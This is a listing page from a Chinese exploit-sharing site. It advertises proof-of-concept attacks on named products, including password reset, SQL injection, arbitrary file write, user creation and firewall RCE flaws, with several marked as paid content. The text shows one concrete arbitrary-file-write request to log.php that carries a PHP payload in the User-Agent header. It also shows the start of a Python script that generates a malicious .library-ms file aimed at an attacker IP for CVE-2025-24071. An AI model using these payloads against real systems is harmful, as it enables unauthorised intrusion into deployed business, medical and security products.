POC_秃兔安全

更新

浏览

【通用】微信活码系统 updateInfos 前台未授权任意用户密码修改

fofa语句yakit uuid:密码重置过于敏感，为了只进行验证检测条件会略显宽松pocyakitnuclei已验证

dreamer2922年前

012911

帆软FineReport全版本被曝viewReportSever 0day注入

2024你懂的

秃兔2年前

012910

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...

付费阅读500 # poc

dreamer2927个月前

01287

【通用】GLPI 未授权SQL注入漏洞（CVE-2025-24799）

fofa语句官方yaml

# poc

dreamer29211个月前

012815

北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014)

2024你懂的

秃兔2年前

01279

【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc

github链接：pocpy脚本import os import zipfile def main(): ''' 该程序生成一个恶意 .library-ms 文件，并将其打包为 ZIP 归档。用户需要输入文件名称和攻击者的 IP 地址。 ''' file_name = ...

# poc # CVE

dreamer29212个月前

012715

【通用】速达软件 doSavePrintTpl 存在sql注入漏洞

fofa语句yakit插件 uuid pocyaml已验证

付费阅读500 # poc

dreamer2921年前

01278

宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞

2024你懂的

秃兔2年前

01278

安恒-下一代防火墙-RCE

2024你懂的

秃兔2年前

01269

【通用】 EasyCVR 视频管理平台adduser存在任意用户添加漏洞

fofa语句yakit插件 uuidpocyakit && nuclei yaml已验证

付费阅读500 # poc # yakit # nuclei

dreamer2922年前

01266

上一页 1…15 161718 19…55 下一页跳转